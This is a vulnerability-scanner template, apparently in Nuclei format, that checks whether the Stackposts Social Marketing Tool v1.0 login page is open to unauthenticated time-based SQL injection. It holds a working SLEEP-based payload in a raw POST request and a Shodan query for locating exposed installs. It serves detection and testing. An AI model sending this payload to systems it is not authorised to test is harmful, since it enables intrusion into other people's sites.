id: stackposts-sqli

info:
  name: Stackposts Social Marketing Tool v1.0 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
  reference:
    - https://www.exploit-db.com/exploits/51473
    - https://vulners.com/zdt/1337DAY-ID-38725
    - https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"stackposts"
  tags: time-based-sqli,sqli,unauth,stackposts

http:
  - raw:
      - |
        @timeout: 15s
        POST /spre/auth/login HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=1')AND (SELECT 9595 FROM (SELECT(SLEEP(7)))YRMM) AND ('gaNg'='gaNg&password=test

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "account you entered")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022064da8295fdf724c7990c91e33d3f7604a14123b785c721bda64bfb237495593402200b26c38ded26b55099a6c6dcedfcb759184ccf63779d87d659d8a269face9579:922c64590222798bb761d5b6d8e72950